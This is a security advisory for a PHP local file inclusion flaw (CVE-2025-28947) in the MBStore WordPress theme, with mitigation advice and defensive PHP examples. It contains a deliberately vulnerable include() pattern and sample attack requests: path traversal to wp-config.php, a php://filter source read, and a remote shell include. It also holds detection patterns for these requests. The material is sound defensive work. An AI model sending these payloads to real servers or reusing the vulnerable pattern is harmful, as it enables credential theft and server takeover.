
CVE-2025-28947: CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in snstheme MBStore - Digital WooCommerce WordPress Theme

Severity: High
Tags: Vulnerability, CVE-2025-28947, CWE-98
Published: Fri Jun 27 2025 (06/27/2025, 11:52:44 UTC)
Source: CVE Database V5
Vendor/Project: snstheme
Product: MBStore - Digital WooCommerce WordPress Theme

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in snstheme MBStore - Digital WooCommerce WordPress Theme allows PHP Local File Inclusion. This issue affects MBStore - Digital WooCommerce WordPress Theme: from n/a through 2.3.

AI-Powered Analysis

AI analysis last updated: 06/27/2025, 12:47:10 UTC

Technical Analysis

CVE-2025-28947 is a high-severity vulnerability classified under CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program). It affects the MBStore - Digital WooCommerce WordPress Theme by snstheme in versions up to and including 2.3. Although the CWE title speaks of "PHP Remote File Inclusion", the advisory text states that the exploitable outcome is PHP Local File Inclusion (LFI): a request parameter flows, without adequate validation, into a PHP include or require statement, so an attacker can steer the include toward files the theme never intended to load. Directory traversal sequences ("../") can pull in arbitrary readable files on the server, and the php://filter stream wrapper is the usual way to read PHP source (for example configuration files containing database credentials) rather than executing it. Turning an LFI into code execution generally requires a file whose content the attacker already influences, such as an uploaded file, a log, or a session file; true remote inclusion of an attacker-hosted URL additionally requires allow_url_include to be enabled, which has been off by default for years and is deprecated since PHP 7.4. The CVSS v3.1 base score is 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H): network attack vector, high attack complexity, no privileges and no user interaction required, and high impact on confidentiality, integrity and availability. The advisory does not name the affected parameter or template, and no public exploit is known at the time of writing, but a successful exploit can still lead to disclosure of credentials and customer data, arbitrary PHP execution, and full compromise of the web server, which makes this a critical risk for WooCommerce stores that handle customer and payment data.
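The advisory does not show the affected code, so the following is an added illustration, not the theme's own source: a generic WordPress-theme pattern of the kind CWE-98 describes, with a request parameter flowing into include, beside a hardened version that allowlists the template name and confines the resolved path to the templates directory. The parameter name layout, the templates/ directory and the allowlist values are assumptions for the demo.

```php
<?php
// Added example, not code from the MBStore theme or its vendor.
// The 'layout' parameter, 'templates/' directory and allowlist are assumptions.

// --- Vulnerable pattern (CWE-98) ---------------------------------------------
// $_GET['layout'] flows straight into include(). "../" sequences reach any
// readable file, and php://filter can exfiltrate PHP source such as wp-config.php.
function render_layout_vulnerable(string $theme_dir): void {
    $layout = isset($_GET['layout']) ? $_GET['layout'] : 'default';
    include $theme_dir . '/templates/' . $layout . '.php';
}

// --- Hardened pattern --------------------------------------------------------
// 1. Only names from a fixed allowlist are accepted; everything else is rejected.
// 2. The final path is resolved with realpath() and must remain inside the
//    templates directory. Either check alone blocks traversal; both together
//    survive an allowlist that later grows a bad entry or a symlink.
const LAYOUT_ALLOWLIST = ['default', 'grid', 'list'];

function resolve_layout_path(string $theme_dir, $requested): ?string {
    $templates = realpath($theme_dir . '/templates');
    if ($templates === false) {
        return null;
    }
    $name = is_string($requested) ? $requested : 'default';
    if (!in_array($name, LAYOUT_ALLOWLIST, true)) {
        return null;                       // unknown name: refuse, do not guess
    }
    $path = realpath($templates . '/' . $name . '.php');
    // realpath() returns false for missing files and collapses "../"; the prefix
    // check rejects anything that resolves outside $templates.
    if ($path === false || strpos($path, $templates . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render_layout_hardened(string $theme_dir): void {
    $path = resolve_layout_path($theme_dir, $_GET['layout'] ?? null);
    if ($path === null) {
        http_response_code(404);           // inside WordPress use status_header(404)
        return;
    }
    include $path;
}

// --- Self-check from the command line ----------------------------------------
if (PHP_SAPI === 'cli') {
    $dir = sys_get_temp_dir() . '/cwe98-demo-' . getmypid();
    mkdir($dir . '/templates', 0700, true);
    file_put_contents($dir . '/templates/default.php', "<?php echo 'default';");
    file_put_contents($dir . '/templates/grid.php',    "<?php echo 'grid';");
    file_put_contents($dir . '/secret.php',            "<?php echo 'secret';");

    $cases = ['grid', '../secret', '../../../../etc/passwd',
              'php://filter/convert.base64-encode/resource=../secret', null];
    foreach ($cases as $c) {
        $r = resolve_layout_path($dir, $c);
        printf("%-60s -> %s\n", var_export($c, true), $r === null ? 'REJECTED' : basename($r));
    }
}
```

In a real theme the cleaner fix is to stop building include paths from request data at all and call get_template_part() with a name chosen from a fixed list; the containment check above is the defence-in-depth layer for code that must compute a path.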

Potential Impact

For European organizations, especially e-commerce businesses running WordPress with the MBStore theme, this vulnerability poses a significant risk. Exploitation could expose customer data, including personal and payment information, which violates GDPR obligations and can lead to heavy fines and reputational damage. The ability to read configuration files and, under the conditions described above, execute arbitrary code on the server would also allow attackers to deploy malware, deface websites, or disrupt services, affecting business continuity and customer trust. Given the widespread use of WooCommerce in Europe and the popularity of commercial WordPress themes, the attack surface is considerable. A compromised storefront can also serve as a foothold for further attacks on corporate networks or on the store's suppliers and customers. Exploitation is remote and requires no authentication; the CVSS vector rates the attack complexity as high, but that should not be read as safety, because file-inclusion flaws are routinely probed by automated scanners once a theme is known to be affected.

Mitigation Recommendations

Immediate mitigation steps include:

1) Update the MBStore - Digital WooCommerce WordPress Theme to a patched version as soon as the vendor publishes one.
2) If no patch is available, temporarily switch to another theme or remove the vulnerable theme; a theme that is inactive but still present on disk can still be reachable if its PHP files are requested directly.
3) Add Web Application Firewall (WAF) rules that block requests whose parameters contain directory traversal sequences ("../", also URL-encoded as "%2e%2e%2f"), PHP stream wrappers (php://, data://, expect://, phar://) or remote URLs; match on the decoded value, not the raw query string.
4) Validate and sanitize every user-supplied value that reaches include or require in custom code or plugins: use an allowlist of template names and confine the resolved path to the intended directory instead of filtering out bad characters.
5) Harden PHP: keep allow_url_include off (it is off by default and deprecated since PHP 7.4), set open_basedir to the WordPress installation and its temp directory, and consider disabling allow_url_fopen after testing, since some plugins fetch remote resources with file_get_contents and will break.
6) Audit web server logs for requests carrying the payload patterns from item 3 against theme endpoints; a 200 response to such a request is the strongest signal, but 404s and 500s still show reconnaissance.
7) Apply least privilege to web server file permissions so that the PHP worker cannot write to directories it only needs to read, which removes most paths from LFI to code execution.
8) Keep comprehensive backups and a tested incident response plan so a compromise can be contained and recovered from quickly.
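Items 3 and 6 above call for matching inclusion payloads in decoded parameter values. The script below is an added example, not part of the advisory or the theme, that audits access log lines in the common "combined" format and reports requests whose parameters look like inclusion attempts. The log lines are constructed for the demo, and the parameter names in them are invented.

```php
<?php
// Added example, not from the advisory: flag file-inclusion payloads in a
// combined-format access log. Sample lines below are constructed for the demo.
const LOG_SAMPLE = <<<'LOG'
203.0.113.5 - - [27/Jun/2025:12:00:01 +0000] "GET /shop/?layout=grid HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Jun/2025:12:00:02 +0000] "GET /shop/?layout=../../../../wp-config.php HTTP/1.1" 200 812 "-" "curl/8.4.0"
203.0.113.7 - - [27/Jun/2025:12:00:03 +0000] "GET /shop/?layout=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "curl/8.4.0"
203.0.113.9 - - [27/Jun/2025:12:00:04 +0000] "GET /shop/?layout=php://filter/convert.base64-encode/resource=wp-config HTTP/1.1" 200 3300 "-" "python-requests/2.31"
203.0.113.9 - - [27/Jun/2025:12:00:05 +0000] "GET /shop/?layout=http://203.0.113.9/shell.txt HTTP/1.1" 500 0 "-" "python-requests/2.31"
198.51.100.2 - - [27/Jun/2025:12:00:06 +0000] "GET /product/?sku=MB-2025&ref=https://example.com/ HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
LOG;

// Patterns that have no business in a value that selects a file. They are
// applied to the URL-decoded value, so "%2e%2e%2f" is caught as "../".
const LFI_PATTERNS = [
    'traversal'   => '~(^|[/\\\\])\.\.([/\\\\]|$)~',
    'php_wrapper' => '~^(php|phar|data|expect|zip|glob|compress\.[a-z]+)://~i',
    'remote_url'  => '~^(https?|ftps?)://~i',
    'null_byte'   => '~\x00~',
];

// $file_params: parameters known to select templates/files (assumed: 'layout').
// A remote URL is only reported for those, since referrer-style parameters
// legitimately carry URLs; traversal and wrappers are reported everywhere.
function audit_log(string $log, array $file_params = ['layout']): array {
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})~', $line, $m)) {
            continue;
        }
        [, $ip, $ts, $method, $target, $status] = $m;
        $q = strpos($target, '?');
        if ($q === false) {
            continue;
        }
        parse_str(substr($target, $q + 1), $params);   // parse_str URL-decodes values
        foreach ($params as $name => $value) {
            if (!is_string($value)) {
                continue;                               // nested array params: skip
            }
            foreach (LFI_PATTERNS as $label => $re) {
                if (!preg_match($re, $value)) {
                    continue;
                }
                if ($label === 'remote_url' && !in_array($name, $file_params, true)) {
                    continue;
                }
                $findings[] = compact('ip', 'ts', 'method', 'name', 'value', 'status', 'label');
                break;                                  // one finding per parameter
            }
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    foreach (audit_log(LOG_SAMPLE) as $f) {
        printf("%-13s %s %-11s %s=%s (HTTP %s)\n",
               $f['ip'], $f['ts'], $f['label'], $f['name'], $f['value'], $f['status']);
    }
}
```

The same decoded-value patterns are what a WAF rule for item 3 should match on; matching the raw query string misses the percent-encoded traversal on the third sample line. Requests with a 200 status against a file-selecting parameter deserve immediate investigation of what the response contained.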


Technical Details

Data Version: 5.1
Assigner Short Name: Patchstack
Date Reserved: 2025-03-11T08:10:12.305Z
CVSS Version: 3.1
State: PUBLISHED

Threat ID: 685e88edca1063fb875de491

Added to database: 6/27/2025, 12:05:01 PM

Last enriched: 6/27/2025, 12:47:10 PM

Last updated: 8/15/2025, 4:04:41 AM

